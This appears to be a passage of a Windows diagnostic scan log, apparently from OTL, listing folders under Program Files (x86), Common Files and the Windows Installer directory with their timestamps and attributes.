[2017/01/31 18:15:43 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Windows Live
[2018/05/04 09:54:54 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Windows Mail
[2018/05/04 09:54:54 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Windows Media Player
[2017/09/29 14:46:37 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Windows Multimedia Platform
[2017/09/29 14:46:33 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\windows nt
[2018/05/04 09:54:54 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Windows Photo Viewer
[2017/09/29 14:46:37 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Windows Portable Devices
[2017/09/29 14:46:33 | 000,000,000 | -HSD | M] -- C:\Program Files (x86)\Windows Sidebar
[2017/09/29 14:46:33 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\WindowsPowerShell
[2018/05/31 16:56:55 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\WinRAR
[2017/08/10 18:16:53 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Wondershare

[color=#A23BEC]< %programfiles%\Google\Desktop\*. >[/color]

[color=#A23BEC]< %ProgramFiles%\Common Files\*. >[/color]
[2017/11/25 14:18:15 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Adobe
[2018/06/11 20:05:39 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Adobe AIR
[2017/11/27 21:25:26 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\ATI Technologies
[2017/05/18 07:22:28 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\AV
[2018/09/25 18:32:23 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\AVSMedia
[2018/10/19 16:36:44 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\BattlEye
[2018/11/08 18:03:46 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Hapase
[2017/07/10 20:25:25 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\InstallShield
[2018/12/29 18:12:15 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\IObit
[2017/10/01 11:12:47 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Java
[2016/02/14 22:04:56 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Microsoft
[2018/05/04 09:58:45 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\microsoft shared
[2018/05/04 21:56:54 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\PX Storage Engine
[2017/07/10 20:25:26 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\ScanSoft Shared
[2016/03/09 16:38:04 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Screaming Bee
[2017/09/29 14:46:37 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Services
[2017/09/24 06:46:09 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Skype
[2018/05/04 09:54:54 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\SpeechEngines
[2018/11/29 18:08:52 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Steam
[2017/05/15 17:42:08 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\SuperLab
[2016/11/25 17:41:52 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Symantec Shared
[2018/05/04 09:54:54 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\system
[2016/05/21 09:01:27 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Windows Live

[color=#A23BEC]< %ProgramFiles(X86)%\Common Files\*. >[/color]
[2017/11/25 14:18:15 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Adobe
[2018/06/11 20:05:39 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Adobe AIR
[2017/11/27 21:25:26 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\ATI Technologies
[2017/05/18 07:22:28 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\AV
[2018/09/25 18:32:23 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\AVSMedia
[2018/10/19 16:36:44 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\BattlEye
[2018/11/08 18:03:46 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Hapase
[2017/07/10 20:25:25 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\InstallShield
[2018/12/29 18:12:15 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\IObit
[2017/10/01 11:12:47 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Java
[2016/02/14 22:04:56 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Microsoft
[2018/05/04 09:58:45 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\microsoft shared
[2018/05/04 21:56:54 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\PX Storage Engine
[2017/07/10 20:25:26 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\ScanSoft Shared
[2016/03/09 16:38:04 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Screaming Bee
[2017/09/29 14:46:37 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Services
[2017/09/24 06:46:09 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Skype
[2018/05/04 09:54:54 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\SpeechEngines
[2018/11/29 18:08:52 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Steam
[2017/05/15 17:42:08 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\SuperLab
[2016/11/25 17:41:52 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Symantec Shared
[2018/05/04 09:54:54 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\system
[2016/05/21 09:01:27 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files\Windows Live

[color=#A23BEC]< %Systemroot%\Installer\*. >[/color]
[2017/12/18 18:52:01 | 000,000,000 | -HSD | M] -- C:\WINDOWS\Installer\$PatchCache$
[2016/03/16 13:26:35 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI125B.tmp-
[2016/03/28 09:57:25 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI1292.tmp-
[2016/02/20 11:47:27 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI13BE.tmp-
[2016/03/16 13:26:30 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI15D.tmp-
[2016/03/16 13:26:35 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI1635.tmp-
[2016/03/28 09:57:25 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI167B.tmp-
[2016/03/28 09:57:30 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI17B5.tmp-
[2016/02/20 11:47:31 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI1D45.tmp-
[2016/01/31 14:37:15 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI1EC.tmp-
[2016/03/06 09:41:08 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI206.tmp-
[2016/03/06 09:56:06 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI208B.tmp-
[2016/01/31 14:36:03 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI216D.tmp-
[2016/02/20 11:49:41 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI2176.tmp-
[2016/01/31 14:36:04 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI2352.tmp-
[2017/12/06 17:14:11 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI25D7.tmp-
[2016/01/31 14:36:04 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI2603.tmp-
[2016/01/31 14:36:05 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI2950.tmp-
[2016/01/31 14:36:06 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI2B35.tmp-
[2016/03/28 09:57:31 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI2B3E.tmp-
[2016/03/28 09:57:31 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI2CD5.tmp-
[2016/01/31 14:36:06 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI2D3A.tmp-
[2016/02/20 11:47:32 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI2D44.tmp-
[2017/08/12 17:32:53 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI2F0F.tmp-
[2016/03/28 09:57:32 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI2F76.tmp-
[2016/02/20 11:47:33 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI2F87.tmp-
[2017/06/17 19:45:22 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI30D4.tmp-
[2018/01/04 19:43:30 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI3428.tmp-
[2016/02/20 11:47:33 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI345A.tmp-
[2017/08/12 17:32:54 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI34CD.tmp-
[2016/03/28 09:57:34 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI3505.tmp-
[2017/06/17 19:45:22 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI36A1.tmp-
[2016/02/20 11:47:34 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI370B.tmp-
[2016/02/20 11:47:35 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI396D.tmp-
[2016/01/31 14:36:09 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI3971.tmp-
[2016/03/28 09:57:35 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI39C8.tmp-
[2016/03/16 13:29:48 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI3AE.tmp-
[2016/01/31 14:37:16 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI3B6C.tmp-
[2017/07/25 12:09:17 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI3BCE.tmp-
[2016/02/20 11:47:35 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI3BEF.tmp-
[2016/03/28 09:57:35 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI3C5A.tmp-
[2016/01/31 14:36:10 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI3CF0.tmp-
[2016/01/31 14:36:11 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI3FB0.tmp-
[2017/08/12 17:29:41 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI4211.tmp-
[2016/03/27 12:30:29 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI43CF.tmp-
[2017/07/25 12:09:18 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI43FD.tmp-
[2017/08/12 17:29:41 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI45CB.tmp-
[2016/11/10 20:42:18 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI465E.tmp-
[2017/12/06 17:14:55 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI484.tmp-
[2016/02/20 11:47:39 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI4900.tmp-
[2016/06/30 10:15:28 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI4C23.tmp-
[2016/03/06 09:56:17 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI4CBF.tmp-
[2016/02/20 11:47:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI4DA9.tmp-
[2016/02/20 11:47:41 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI5105.tmp-
[2016/03/06 09:56:19 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI550E.tmp-
[2017/12/06 17:14:12 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI5A36.tmp-
[2017/12/06 17:14:12 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI5B60.tmp-
[2016/03/06 09:56:24 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI5CB3.tmp-
[2017/06/26 12:06:31 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI5CC4.tmp-
[2017/12/06 17:14:13 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI5DE4.tmp-
[2017/12/06 17:14:13 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI5FEA.tmp-
[2016/03/16 13:26:57 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI602F.tmp-
[2017/12/06 17:14:14 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI62BA.tmp-
[2016/03/16 13:26:57 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI6B5C.tmp-
[2016/03/16 13:29:37 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI6E89.tmp-
[2016/03/06 09:56:26 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI703C.tmp-
[2016/02/03 14:04:27 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI724E.tmp-
[2017/12/06 17:14:18 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI7453.tmp-
[2017/12/06 17:14:18 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI756D.tmp-
[2016/03/06 09:56:27 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI75EA.tmp-
[2017/12/06 17:14:19 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI7678.tmp-
[2016/03/06 09:56:28 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI78E9.tmp-
[2017/12/06 17:14:20 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI7A09.tmp-
[2016/03/06 09:56:29 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI7D3F.tmp-
[2017/12/06 17:38:27 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI7D44.tmp-
[2016/03/06 09:56:31 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI804D.tmp-
[2016/01/31 14:36:31 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI843C.tmp-
[2016/03/06 09:50:52 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI848E.tmp-
[2016/03/06 09:56:04 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI877.tmp-
[2016/03/06 09:56:31 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI87F0.tmp-
[2016/06/30 10:03:22 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI88F6.tmp-
[2016/06/30 10:03:22 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI89C2.tmp-
[2016/03/06 09:56:32 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI8A62.tmp-
[2017/08/12 17:13:01 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI8D.tmp-
[2016/03/06 09:56:34 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI8D7F.tmp-
[2017/12/06 17:38:27 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI8F65.tmp-
[2017/12/06 17:38:27 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI9041.tmp-
[2017/10/11 15:33:00 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI914F.tmp-
[2016/01/31 14:36:32 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI916C.tmp-
[2017/12/06 17:38:28 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI9287.tmp-
[2017/12/06 17:38:29 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI93D1.tmp-
[2016/01/31 14:36:59 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI947A.tmp-
[2016/01/31 14:35:58 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI95.tmp-
[2016/02/20 11:48:01 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI95A1.tmp-
[2016/03/06 09:56:35 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI96A8.tmp-
[2017/12/06 17:38:29 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI9941.tmp-
[2016/02/03 14:04:32 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI9943.tmp-
[2017/12/29 17:20:49 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI99AB.tmp-
[2016/03/06 09:56:36 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI9BE9.tmp-
[2016/06/30 10:03:27 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI9D16.tmp-
[2016/06/30 10:15:28 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI9D72.tmp-
[2016/03/06 09:56:37 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI9DDE.tmp-
[2016/06/30 10:15:28 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSI9F18.tmp-
[2016/06/30 10:15:29 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIA013.tmp-
[2016/06/30 10:15:29 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIA0F0.tmp-
[2016/06/30 10:15:29 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIA18E.tmp-
[2016/11/10 19:18:39 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIA1BA.tmp-
[2016/06/30 10:15:29 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIA23B.tmp-
[2016/03/28 09:57:23 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIA34.tmp-
[2016/02/20 11:48:03 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIA35D.tmp-
[2016/02/03 14:04:19 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIA613.tmp-
[2016/06/30 10:15:30 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIA669.tmp-
[2016/02/03 14:04:34 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIA71F.tmp-
[2016/02/20 11:49:21 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIA8CD.tmp-
[2016/02/03 14:04:35 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIABB4.tmp-
[2016/02/03 14:04:36 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIAFBC.tmp-
[2016/02/03 14:04:36 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIB432.tmp-
[2016/02/03 14:04:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIB6B3.tmp-
[2016/11/10 19:18:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIBAA2.tmp-
[2016/11/10 19:18:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIBD33.tmp-
[2016/03/28 09:57:11 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIC573.tmp-
[2016/02/03 14:04:41 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIC710.tmp-
[2016/02/03 14:04:42 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSICA0E.tmp-
[2016/02/03 14:04:43 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSICC71.tmp-
[2017/12/06 17:01:36 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSID08A.tmp-
[2016/02/03 14:04:45 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSID22E.tmp-
[2016/03/06 09:38:58 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSID5.tmp-
[2017/12/06 17:01:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSID512.tmp-
[2016/02/03 14:04:46 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSID944.tmp-
[2016/11/10 20:42:03 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIDAA3.tmp-
[2016/03/16 13:26:22 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIDB5F.tmp-
[2016/02/03 14:04:46 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIDB68.tmp-
[2016/03/28 09:57:24 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIDEE.tmp-
[2016/02/20 11:49:39 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIE0E2.tmp-
[2016/03/28 09:57:14 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIE263.tmp-
[2016/03/16 13:29:47 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIE47D.tmp-
[2016/03/16 13:26:26 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIE5A1.tmp-
[2016/06/30 10:15:48 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIE9B6.tmp-
[2016/03/16 13:26:33 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIECC.tmp-
[2017/12/06 17:01:44 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIF09F.tmp-
[2016/03/28 09:57:22 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIF15B.tmp-
[2016/03/16 13:26:26 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIF38C.tmp-
[2016/03/27 13:14:52 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIF43B.tmp-
[2016/03/16 13:26:27 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIF543.tmp-
[2016/03/16 13:26:28 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIF92C.tmp-
[2016/01/31 14:36:03 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIF99.tmp-
[2016/03/16 13:26:29 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIFC4A.tmp-
[2017/08/12 17:13:00 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIFCA4.tmp-
[2016/03/16 13:26:30 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\MSIFEBC.tmp-
[2018/04/26 08:43:37 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\Razer
[2018/04/25 16:04:16 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\Razer Central
[2018/04/25 16:02:15 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\Razer Game Manager Service
[2018/04/25 16:03:31 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\Razer InGame Engine
[2017/04/14 12:11:53 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\_{7B11A2EA-168E-442A-809E-5F8908A7504F}
[2017/04/14 12:08:10 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\_{C345A462-2044-47D6-81F6-A4416453A514}
[2018/05/17 10:20:30 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{026D2025-A7FA-4F5C-AF8C-A6F7A9B917FC}
[2017/01/31 18:15:49 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{04BE4035-3C8E-4B48-BFB8-1655849C0C8B}
[2017/04/06 16:42:00 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{08D2E121-7F6A-43EB-97FD-629B44903403}
[2018/04/25 16:04:15 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{0CD55593-F275-4aea-92B2-9170B5A14644}
[2018/02/06 18:48:44 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{0EFDF2F9-836D-4EB7-A32D-038BD3F1FB2A}
[2017/09/17 16:43:19 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{11B73856-A062-4E6B-A80E-A3F380BBAB65}
[2017/11/27 21:25:26 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{12434519-5359-85DD-F638-D6BA24A9531A}
[2017/12/29 21:08:53 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{183B7F63-68B0-41E4-A3CA-2578C44429D3}
[2016/04/11 07:32:48 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}
[2017/11/27 21:24:54 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{1C72CC1B-C0F6-F698-0E23-0D705A86E224}
[2017/08/11 16:55:55 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{1D09B594-C8B5-4CF1-B927-41D9A487799C}
[2017/11/27 21:24:39 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{25107779-C295-EB3E-3C92-AC1B45680012}
[2018/07/11 08:49:04 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{29DC4128-CF89-49D9-A524-B4430F036F14}
[2017/04/18 07:21:02 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}
[2017/11/27 21:25:14 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{2F27CD8D-88AE-7895-EA61-93EF8AA57B7D}
[2017/11/27 21:24:59 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{36637D5B-1305-1ED8-EEC3-4C76A6655FCF}
[2018/01/04 19:43:22 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{36EAD5CF-44EF-4FCF-8BE1-D96C4835D7A4}
[2017/11/27 21:25:03 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{3795E3F4-CA46-EA65-4FD2-D861A2A12ECD}
[2017/11/27 21:25:04 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{3997DF5C-EF46-B135-D73B-C8BFE797105A}
[2017/12/06 13:20:46 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}
[2017/11/27 21:25:05 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{3C76DB65-E66A-DE04-4CE3-5DA42ED98685}
[2017/11/27 21:25:01 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{3DC9D062-2C3E-7C31-504C-BF2751617224}
[2017/11/27 21:25:07 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{3F5AED19-3C1C-6ED5-EAF0-CBE15BB3B8F1}
[2017/11/27 21:25:06 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{495EB8CB-A455-8033-EF42-65AEFFF4ED97}
[2017/11/27 21:24:58 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{4A22F96C-993D-3489-2CB1-37C61F29135C}
[2017/11/27 21:25:30 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{503F672D-6C84-448A-8F8F-4BC35AC83441}
[2017/11/27 21:25:00 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{5612D4CE-C024-80F5-9F59-546B95F884B2}
[2017/11/27 21:24:55 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{5662A630-98E4-2FDC-CE6A-73D21240DC52}
[2018/07/11 09:07:43 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{62733D95-4AB1-46F7-95AD-68F23E846012}
[2017/11/27 21:25:27 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{65312278-952C-D46E-8297-4CAB93F5B2DF}
[2017/11/27 21:25:34 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{6809A67A-D099-48EA-9126-8567130CF377}
[2017/11/27 21:25:03 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{73E1C443-5420-442D-B314-649AE103D08B}
[2017/11/27 21:24:49 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{77864743-57AB-A566-67D6-12EF64165209}
[2018/06/27 13:06:36 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{7F9A97E6-E666-11E5-B582-B88687E82322}
[2017/11/27 21:24:51 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{84F49E05-683A-5544-263D-08E4814F196B}
[2017/11/27 21:24:57 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{90579CE9-8FB6-88A3-09ED-68F30E763BBC}
[2017/04/06 16:41:55 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{92D58719-BBC1-4CC3-A08B-56C9E884CC2C}
[2017/11/27 21:24:53 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{9927F5EF-AAB0-E471-1DBF-3940E9477D23}
[2018/12/08 13:31:15 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{A824659C-13F7-46F2-A3B6-0E22538168BC}
[2018/06/26 12:16:26 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{AB71A108-F2D2-4842-A61C-F56C8B58AA0E}
